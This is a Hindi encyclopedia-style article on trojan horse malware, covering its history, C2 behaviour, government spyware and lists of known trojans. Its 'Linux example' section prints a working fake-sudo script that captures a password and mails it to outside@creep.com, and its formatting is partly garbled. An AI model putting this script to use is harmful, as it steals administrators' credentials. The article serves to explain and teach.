ट्रोजन हॉर्स (कंप्यूटिंग)

संगणन में, एक ट्रोजन हॉर्स कोई भी ऐसा मैलवेयर है जो उपयोगकर्ताओं को उसके वास्तविक उद्देश्य के बारे में गुमराह करता है। यह शब्द भ्रामक ट्रोजन हॉर्स की प्राचीन ग्रीक कहानी से लिया गया है ,जिसके कारण ट्रॉय शहर का पतन हुआ। ट्रोजन आमतौर पर सामाजिक अभियान्त्रिकी  के किसी रूप से फैलते हैं; उदाहरण के लिए, जहां एक उपयोगकर्ता को अहानिकर प्रतीत होने वाले एक विपत्र संलग्नक (उदाहरण के लिए, एक नियमित विधि भरने के लिए), या सामाजिक संचार माध्यम पर या अन्य जगहों पर किसी नकली विज्ञापन पर क्लिक करके निष्पादित करने में धोखा दिया जाता है। हालांकि वे किसी भी आयभार के हो सकते हैं, कई आधुनिक रूप गुप्तद्वार के रूप में कार्य करते हैं ,एक नियंत्रक से संपर्क करते हैं जो प्रभावित परिकलक तक अनधिकृत पहुंच प्राप्त कर सकते हैं। रैंसमवेयर हमले अक्सर ट्रोजन का उपयोग करके किए जाते हैं।

परिकलक विषाणु और कृमि के विपरीत, ट्रोजन आमतौर पर खुद को अन्य दस्तावेजों में नवीनता करने या अन्यथा स्वयं को प्रचारित करने का प्रयास नहीं करते हैं।

शब्द का प्रयोग
यह स्पष्ट नहीं है कि अवधारणा और इसके लिए शब्द का पहली बार उपयोग कब और कहाँ किया गया था,लेकिन 1971 तक पहले यूनिक्स पुस्तिका ने मान लिया था कि इसके पाठक दोनों को जानते हैं:

एक और प्रारंभिक संदर्भ 1974 में मॉलटिक्स परिकलक प्रणाली में भेद्यता के विश्लेषण पर अमेरिकी वायु सेना के संदेश में है।

इसे केन थॉम्पसन द्वारा 1983 के अपने ट्यूरिंग पुरस्कार स्वीकृति व्याख्यान "विश्वासी न्यास पर परावर्तन" में लोकप्रिय बनाया गया था। उपशीर्षक: किस हद तक एक बयान पर भरोसा करना चाहिए कि एक कार्यक्रम ट्रोजन हॉर्स से मुक्त है? प्रक्रिया सामग्री लिखने वाले लोगों पर भरोसा करना शायद अधिक महत्वपूर्ण है। उन्होंने उल्लेख किया कि वे मॉलटिक्स की सुरक्षा पर एक संदेश से ट्रोजन के संभावित अस्तित्व के बारे में जानते थे।

व्यवहार
एक बार अधिष्ठापित हो जाने पर, ट्रोजन विभिन्न प्रकार के दुर्भावनापूर्ण कार्य कर सकते हैं। एकाधिक अंतर्जाल पर एक या अधिक आदेश और संयम (C2) परिसेवक संपर्क करते हैं और निर्देशो की प्रतीक्षा करते हैं। चूंकि व्यक्तिगत ट्रोजन आमतौर पर इस संचार के लिए बंदरगाहों के एक विशिष्ट समुच्चय का उपयोग करते हैं, इसलिए उनका पता लगाना अपेक्षाकृत सरल हो सकता है। इसके अलावा, अन्य मैलवेयर ट्रोजन को दुर्भावनापूर्ण गतिविधि के लिए प्रतिनिधि के रूप में उपयोग करके संभावित रूप से कब्जा कर सकते हैं।

जर्मन भाषी देशों में, सरकार द्वारा उपयोग किए जाने वाले या बनाए गए जासूसी के सोफ्टवेयर को कभी-कभी गोववेयर कहा जाता है। गोववेयर आमतौर पर एक ट्रोजन प्रक्रिया सामाग्री है जिसका उपयोग लक्ष्य परिकलक से संचार को बाधित करने के लिए किया जाता है। स्विट्ज़रलैंड और जर्मनी जैसे कुछ देशों में ऐसी प्रक्रियात्मक सामाग्री के उपयोग को नियंत्रित करने वाला एक कानूनी ढांचा है। गोववेयर ट्रोजन के उदाहरणों में स्विस मिनीपैंजर और मेगापैंजर और जर्मन "राजकीय ट्रोजन" उपनाम R2D2 शामिल है। जर्मन गोववेयर आम जनता के लिए अज्ञात सुरक्षा अंतराल का शोषण करके और अन्य अनुप्रयोगों के माध्यम से कूट किए जाने से पहले स्मार्टफोन डेटा तक पहुंचने का काम करता है।

विच्छेदको के बीच बोटनेट की लोकप्रियता और विज्ञापन सेवाओं की उपलब्धता के कारण, जो लेखकों को अपने उपयोगकर्ताओं की गोपनीयता का उल्लंघन करने की अनुमति देते हैं, ट्रोजन अधिक आम होते जा रहे हैं। बिटडिफेंडर द्वारा जनवरी से जून 2009 तक किए गए एक सर्वेक्षण के अनुसार, "ट्रोजन-प्रकार के मैलवेयर बढ़ रहे हैं, जो दुनिया में पाए गए वैश्विक मैलवेयर का 83% हिस्सा हैै"। ट्रोजन का कीड़ों से संबंध है,क्योंकि वे कीड़ों की मदद से फैलते हैं और उनके साथ अंतर्जाल पर यात्रा करते हैं। बिटडिफेंडर ने कहा है कि लगभग 15% परिकलक एक बॉटनेट के सदस्य हैं, जो आमतौर पर ट्रोजन संक्रमणों द्वारा भर्ती किए जाते हैं।

लिनक्स उदाहरण
ट्रोजन हॉर्स एक ऐसी योजना है जो कुछ स्पष्ट कार्य करने का दावा करती है, फिर भी निष्पादन पर यह उपयोगकर्ता की सुरक्षा से समझौता करती है। एक सुविधाजनक विकल्प लिनक्स सुडो आदेश का नया संस्करण है। आदेश को तब सार्वजनिक रूप से लिखने योग्य निर्देशिका में अनुकृति किया जाता है यदि कोई व्यवस्थापक उस निर्देशिका में होता है और   को निष्पादित करता है, तो ट्रोजन हॉर्स को निष्पादित किया जा सकता है। यहाँ एक कार्यशील संस्करण है। : # stty -echo /bin/echo -n "Password for `whoami`: " read x /bin/echo "" stty echo echo $x | mail -s "`whoami` password" outside@creep.com sleep 1 echo Sorry. rm $0 exit 0 कमांड लाइन आधारित ट्रोजन हॉर्स को रोकने के लिए,   पर्यावरण चर में प्रवेश पूंछ के अंत में स्थित होना चाहिए। उदाहरण के लिए:.
 * 1) sudo
 * 1) Turn off the character echo to the screen.
 * 1) Turn back on the character echo.

निजी और सरकारी

 * एएनओएम - एफबीआई
 * कैओस कंप्यूटर क्लब#Staatstrojaner|0zapftis / r2d2 StaatsTrojaner – DigiTask
 * डार्ककॉमेट - सीआईए / एनएसए
 * फिनफिशर - लेंच आईटी समाधान / गामा इंटरनेशनल
 * हैकिंग टीम# उत्पाद और क्षमताएं | दा विंची / गैलीलियो आरसीएस - हैकिंग टीम
 * जादू लालटेन (सॉफ्टवेयर) - एफबीआई
 * 2020 यूनाइटेड स्टेट्स फेडरल गवर्नमेंट डेटा ब्रीच - फॉरेन इंटेलिजेंस सर्विस (रूस)आरामदायक भालू (संदिग्ध)
 * जरूरत के हिसाब से एक्सेस ऑपरेशंस#क्वांटम अटैक|टीएओ क्वांटम/फॉक्सैसिड - एनएसए
 * योद्धा गौरव - जीसीएचक्यू

सार्वजनिक रूप से उपलब्ध

 * ईजीएबीटीआर - 1980 के दशक के अंत में
 * नेटबस - 1998 (प्रकाशित)
 * मोबमैन द्वारा प्रभात - 1999 (प्रकाशित)
 * पीछे का छिद्र - 1998 (प्रकाशित)
 * बीस्ट (ट्रोजन हॉर्स) - 2002 (प्रकाशित)
 * बिफ्रोस्ट (ट्रोजन हॉर्स) - 2004 (प्रकाशित)
 * डार्ककॉमेट - 2008-2012 (प्रकाशित)
 * ब्लैकहोल शोषण किट - 2012 (प्रकाशित)
 * घोस्ट आरएटी - 2009 (प्रकाशित)
 * मिनीपैंजर और मेगापैंजर - 2009 (प्रकाशित)
 * Leurak द्वारा MEMZ - 2016 (प्रकाशित)

सुरक्षा शोधकर्ताओं द्वारा पता लगाया

 * बारह टोटके - 1990
 * क्लिकबॉट.ए - 2006 (खोजा गया)
 * ज़्यूस (ट्रोजन हॉर्स) - 2007 (खोजा गया)
 * ट्रोजन बैकडोर। फ्लैशबैक - 2011 (खोजा गया)
 * ज़ीरो एक्सेस बॉटनेट - 2011 (खोजा गया)
 * कोबफेस - 2008 (खोजा गया)
 * चोट - 2009 (खोजा गया)
 * कोरफ्लड - 2010 (खोजा गया)
 * टिनी बैंकर ट्रोजन - 2012 (खोजा गया)
 * सोवा - 2022 (खोजा गया)
 * गवाह एंड्रॉइड मैलवेयर - 2015 (खोजा गया)

पूंजीकरण
परिकलक शब्द "ट्रोजन हॉर्स" प्राचीन शहर ट्रॉय के प्रसिद्ध ट्रोजन हॉर्स से लिया गया है। इस कारण ट्रोजन को अक्सर पूंजीकृत किया जाता है। हालाँकि, जबकि शैली गाइड्स और शब्दकोश अलग-अलग हैं, कई लोग सामान्य उपयोग के लिए छोटे अक्षर "ट्रोजन" का सुझाव देते हैं।

यह भी देखें

 * कंप्यूटर सुरक्षा
 * कोयल का अंडा (रूपक) | कोयल का अंडा (रूपक)
 * साइबर जासूसी
 * नाचने वाले सूअर
 * शोषण (कंप्यूटर सुरक्षा)
 * औद्योगिक जासूसी
 * फ़िशिंग
 * कम से कम विशेषाधिकार का सिद्धांत
 * गोपनीयता-आक्रामक सॉफ्टवेयर
 * दूरस्थ प्रशासन
 * दूरस्थ प्रशासन सॉफ्टवेयर
 * उल्टा कनेक्शन
 * दुष्ट सुरक्षा सॉफ्टवेयर
 * धोखाधड़ी करने वाले
 * तकनीकी सहायता घोटाला
 * कंप्यूटर वायरस और वर्म्स की समयरेखा
 * ज़ोंबी (कंप्यूटर विज्ञान)